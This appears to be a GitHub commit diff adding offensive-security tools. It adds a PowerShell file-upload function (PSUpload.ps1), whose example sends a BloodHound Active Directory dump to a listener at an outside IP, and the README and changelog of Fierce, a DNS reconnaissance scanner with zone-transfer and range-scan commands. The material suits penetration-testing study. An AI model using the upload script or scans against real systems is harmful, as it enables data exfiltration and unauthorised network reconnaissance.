2024.10.7

sh1yan · Oct 7, 2024 · d67ce53 · d67ce53
1 parent 103b179
commit d67ce53
Show file tree

Hide file tree

Showing 16 changed files with 29,154 additions and 0 deletions.
diff --git a/.DS_Store b/.DS_Store
diff --git a/Powershell-Other/PSUpload.ps1 b/Powershell-Other/PSUpload.ps1
@@ -0,0 +1,50 @@
+<#
+
+PowerShell Script to upload files using uploadserver module 
+Github: https://github.com/Densaugeo/uploadserver
+
+To execute the server run in your Linux Machine:
+pip3 install uploadserver
+python3 -m uploadserver
+
+Example PS:
+Invoke-FileUpload -File C:\Users\plaintext\Desktop\20200717080254_BloodHound.zip -Uri http://192.168.49.128:8000/upload
+
+References: https://gist.github.com/arichika/91a8b1f60c87512401e320a614099283
+
+#>
+
+function Invoke-FileUpload {
+	Param (
+		[Parameter(Position = 0, Mandatory = $True)]
+		[String]$File,
+
+		[Parameter(Position = 1, Mandatory = $True)]
+		[String]$Uri
+		)
+
+	$FileToUpload = Get-ChildItem -File "$File"
+
+	$UTF8woBOM = New-Object "System.Text.UTF8Encoding" -ArgumentList @($false)
+	$boundary = '----BCA246E0-E2CF-48ED-AACE-58B35D68B513'
+	$tempFile = New-TemporaryFile
+	Remove-Item $tempFile -Force -ErrorAction Ignore
+	$sw = New-Object System.IO.StreamWriter($tempFile, $true, $UTF8woBOM)
+	$fileName = [System.IO.Path]::GetFileName($FileToUpload.FullName)
+	$sw.Write("--$boundary`r`nContent-Disposition: form-data;name=`"files`";filename=`"$fileName`"`r`n`r`n")
+	$sw.Close()
+	$fs = New-Object System.IO.FileStream($tempFile, [System.IO.FileMode]::Append)
+	$bw = New-Object System.IO.BinaryWriter($fs)
+	$fileBinary = [System.IO.File]::ReadAllBytes($FileToUpload.FullName)
+	$bw.Write($fileBinary)
+	$bw.Close()
+	$sw = New-Object System.IO.StreamWriter($tempFile, $true, $UTF8woBOM)
+	$sw.Write("`r`n--$boundary--`r`n")
+	$sw.Close()
+
+	Invoke-RestMethod -Method POST -Uri $uri -ContentType "multipart/form-data; boundary=$boundary" -InFile $tempFile
+
+	$FileHash = Get-FileHash -Path "$File" -Algorith MD5 
+	Write-Host "[+] File Uploaded: " $FileToUpload.FullName
+	Write-Host "[+] FileHash: " $FileHash.Hash
+}
diff --git a/fierce/.DS_Store b/fierce/.DS_Store
diff --git a/fierce/CHANGELOG.md b/fierce/CHANGELOG.md
@@ -0,0 +1,151 @@
+# Change Log
+
+All notable changes to this project will be documented in this file.
+This project adheres to [Semantic Versioning](http://semver.org/).
+This project adheres to [CHANGELOG](http://keepachangelog.com/).
+
+## [Unreleased]
+
+## [1.6.0] - 2024-08-28
+
+### Fixed
+
+- Add proper error handling for cases when SOA record is None
+- `random.randint` requires `int` arguments ([#44](https://github.com/mschwager/fierce/issues/44))
+
+### Added
+
+- Official Python 3.11 support
+- Official Python 3.12 support
+
+### Removed
+
+- Official Python 3.6 support
+- Official Python 3.7 support
+
+## [1.5.0] - 2021-12-05
+
+### Added
+
+- Official Python 3.9 support
+- Official Python 3.10 support
+
+### Changed
+
+- Improved various error handling
+
+### Removed
+
+- Official Python 3.5 support
+
+## [1.4.0] - 2019-11-07
+
+### Added
+
+- Official Python 3.8 support
+- The --tcp flag to use TCP instead of UDP DNS queries
+
+### Removed
+
+- Official Python 3.4 support, it's EOL
+
+## [1.3.0] - 2019-05-15
+
+### Changed
+
+- Print out all A records for wildcard, not just first one
+
+### Added
+
+- Filter out subdomains with an A record matching a wildcard A record
+- Official Python 3.7 support
+
+### Fixed
+
+- Prevent out of bounds error when expanding IPs near 0.0.0.0 or 255.255.255.255
+
+## [1.2.2] - 2018-04-24
+
+### Changed
+
+- Python 3 is now a requirement when installing via setup.py (including pip)
+- The README markdown is now included in the package's long description
+
+## [1.2.1] - 2018-03-01
+
+### Changed
+
+- Nearby IP reverse queries are now multithread, which improves performance significantly
+- Updated development dependencies
+- Subdomain lists use package_data instead of data_files
+
+### Added
+
+- Gracefully handle users exiting the script with Ctrl+C
+- Gracefully handle incorrect file or IP range arguments
+
+### Removed
+
+- Official Python 3.3 support, it's EOL
+
+## [1.2.0] - 2017-05-07
+
+### Added
+
+- Official Python 3.6 support
+
+### Fixed
+
+- Handling of subdomains specified that are actually FQDNs
+- Gracefully handling timeouts when querying nameservers
+- Gracefully handling timeouts when querying zone transfers
+
+## [1.1.5] - 2017-01-08
+
+### Fixed
+
+- Fixed bug with CNAME records pointing to an A record without an associated IP
+- Fixed bug with connections being closed by remote peer
+
+## [1.1.4] - 2016-08-30
+
+### Fixed
+
+- Undo a PR that was breaking everything
+
+## [1.1.3] - 2016-08-30
+
+### Fixed
+
+- Fixed a subdomain concatenation bug
+
+## [1.1.2] - 2016-08-15
+
+### Changed
+
+- PyPI is absolutely ridiculous and needs a new version to upload the same package
+
+## [1.1.1] - 2016-08-11
+
+### Changed
+
+- Better error handling when making network connections
+- PEP8 formatting
+
+## [1.1.0] - 2016-05-16
+
+### Added
+
+- Intelligent subdomain file searching
+- PyPI classifiers
+
+### Changed
+
+- Using more modern setuptools instead of distutils
+- Small README improvements
+
+## [1.0.0] - 2016-05-08
+
+### Added
+
+- Initial release of Fierce
diff --git a/fierce/README.md b/fierce/README.md
@@ -0,0 +1,143 @@
+# Fierce
+
+[![CI](https://github.com/mschwager/fierce/actions/workflows/ci.yml/badge.svg)](https://github.com/mschwager/fierce/actions/workflows/ci.yml)
+[![Python Versions](https://img.shields.io/pypi/pyversions/fierce.svg)](https://img.shields.io/pypi/pyversions/fierce.svg)
+[![PyPI Version](https://img.shields.io/pypi/v/fierce.svg)](https://img.shields.io/pypi/v/fierce.svg)
+
+Fierce is a `DNS` reconnaissance tool for locating non-contiguous IP space.
+
+Useful links:
+
+* [Domain Name System (DNS)](https://en.wikipedia.org/wiki/Domain_Name_System)
+  * [Domain Names - Concepts and Facilities](https://tools.ietf.org/html/rfc1034)
+  * [Domain Names - Implementation and Specification](https://tools.ietf.org/html/rfc1035)
+  * [Threat Analysis of the Domain Name System (DNS)](https://tools.ietf.org/html/rfc3833)
+* [Name Servers (NS)](https://en.wikipedia.org/wiki/Domain_Name_System#Name_servers)
+* [State of Authority Record (SOA)](https://en.wikipedia.org/wiki/List_of_DNS_record_types#SOA)
+* [Zone Transfer](https://en.wikipedia.org/wiki/DNS_zone_transfer)
+  * [DNS Zone Transfer Protocol (AXFR)](https://tools.ietf.org/html/rfc5936)
+  * [Incremental Zone Transfer in DNS (IXFR)](https://tools.ietf.org/html/rfc1995)
+* [Wildcard DNS Record](https://en.wikipedia.org/wiki/Wildcard_DNS_record)
+
+# Overview
+
+First, credit where credit is due, `fierce` was
+[originally written](https://github.com/mschwager/fierce/blob/master/scripts/fierce.pl)
+by RSnake along with others at http://ha.ckers.org/. This is simply a
+conversion to Python 3 to simplify and modernize the codebase.
+
+The original description was very apt, so I'll include it here:
+
+> Fierce is a semi-lightweight scanner that helps locate non-contiguous
+> IP space and hostnames against specified domains. It's really meant
+> as a pre-cursor to nmap, unicornscan, nessus, nikto, etc, since all 
+> of those require that you already know what IP space you are looking 
+> for. This does not perform exploitation and does not scan the whole 
+> internet indiscriminately. It is meant specifically to locate likely 
+> targets both inside and outside a corporate network. Because it uses 
+> DNS primarily you will often find mis-configured networks that leak 
+> internal address space. That's especially useful in targeted malware.
+
+# Installing
+
+```
+$ python -m pip install fierce
+$ fierce -h
+```
+
+OR
+
+```
+$ git clone https://github.com/mschwager/fierce.git
+$ cd fierce
+$ python -m pip install dnspython==1.16.0
+$ python fierce/fierce.py -h
+```
+
+# Using
+
+Let's start with something basic:
+
+```
+$ fierce --domain google.com --subdomains accounts admin ads
+```
+
+Traverse IPs near discovered domains to search for contiguous blocks with the
+`--traverse` flag:
+
+```
+$ fierce --domain facebook.com --subdomains admin --traverse 10
+```
+
+Limit nearby IP traversal to certain domains with the `--search` flag:
+
+```
+$ fierce --domain facebook.com --subdomains admin --search fb.com fb.net
+```
+
+Attempt an `HTTP` connection on domains discovered with the `--connect` flag:
+
+```
+$ fierce --domain stackoverflow.com --subdomains mail --connect
+```
+
+Exchange speed for breadth with the `--wide` flag, which looks for nearby
+domains on all IPs of the [/24](https://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing#IPv4_CIDR_blocks)
+of a discovered domain:
+
+```
+$ fierce --domain facebook.com --wide
+```
+
+Zone transfers are rare these days, but they give us the keys to the DNS castle.
+[zonetransfer.me](https://digi.ninja/projects/zonetransferme.php) is a very
+useful service for testing for and learning about zone transfers:
+
+```
+$ fierce --domain zonetransfer.me
+```
+
+To save the results to a file for later use we can simply redirect output:
+
+```
+$ fierce --domain zonetransfer.me > output.txt
+```
+
+Internal networks will often have large blocks of contiguous IP space assigned.
+We can scan those as well:
+
+```
+$ fierce --dns-servers 10.0.0.1 --range 10.0.0.0/24
+```
+
+Check out `--help` for further information:
+
+```
+$ fierce --help
+```
+
+# Developing
+
+First, install [`poetry`](https://python-poetry.org/docs/#installation) and development packages:
+
+```
+$ poetry install --with dev
+```
+
+## Testing
+
+```
+$ poetry run pytest
+```
+
+## Linting
+
+```
+$ poetry run flake8
+```
+
+## Coverage
+
+```
+$ poetry run pytest --cov
+```
diff --git a/fierce/fierce/__init__.py b/fierce/fierce/__init__.py